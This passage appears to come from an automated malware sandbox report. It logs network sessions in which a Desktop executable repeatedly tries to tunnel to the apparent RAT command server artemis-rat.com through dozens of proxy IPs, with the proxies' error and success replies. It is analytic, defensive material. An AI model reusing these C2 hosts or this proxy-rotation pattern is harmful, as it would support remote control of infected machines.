6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1986192.168.2.555311103.156.232.8556783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.402853012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1987192.168.2.555363116.254.100.165505363876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.413646936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1988192.168.2.555268103.242.119.88803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.413786888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.820102930 CET629INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Authorization"
                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1989192.168.2.555351212.108.155.20590903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.413788080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1990192.168.2.555007124.163.236.5473023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.417335033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1991192.168.2.555329110.16.77.10180823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.420880079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.858644009 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 717
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:22:33 GMT
                                                                                                                                                                                                                                                            Expires: Mon, 11 Mar 2024 02:22:33 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1992192.168.2.555406104.16.105.106803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.474179029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.628536940 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1993192.168.2.554241184.170.248.541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.475142956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1994192.168.2.55511636.93.157.4956783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.476219893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1995192.168.2.55538013.59.156.16731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.476480961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.693008900 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1996192.168.2.552051200.35.49.57425413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.476656914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.278513908 CET202INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                            Content-Length: 716
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Date: Wed, 13 Sep 2023 12:45:23 GMT
                                                                                                                                                                                                                                                            Expires: Wed, 13 Sep 2023 12:45:23 GMT
                                                                                                                                                                                                                                                            Server: Mikrotik HttpProxy
                                                                                                                                                                                                                                                            Proxy-Connection: close


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1997192.168.2.55536945.11.95.16550493876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.515403986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1998192.168.2.55537143.133.74.172156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.520713091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1999192.168.2.55542120.80.103.19331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.521612883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:14.899197102 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:15.533926010 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:16.174768925 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:17.453476906 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:20.075948954 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:25.200278044 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:35.438986063 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:56.944808006 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:37.899543047 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:59.819581032 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2000192.168.2.555392162.223.91.11803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.521615982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2001192.168.2.55540944.190.9.65481003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.521616936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2002192.168.2.551931167.86.69.142453643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.521960974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.592603922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.592852116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2003192.168.2.55196252.80.55.7880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.521960974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.023475885 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2004192.168.2.552021172.93.111.235435203876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.522289991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2005192.168.2.555378167.71.5.8331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.527827024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.069966078 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2006192.168.2.55539445.191.75.1869993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.534347057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2007192.168.2.55431498.188.47.13241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.566674948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2008192.168.2.55537745.11.95.16560103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.573149920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2009192.168.2.55402950.63.12.10160953876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.574886084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2010192.168.2.555400149.210.235.10781183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.575947046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.237190962 CET132INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2011192.168.2.55540846.35.9.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.579926968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


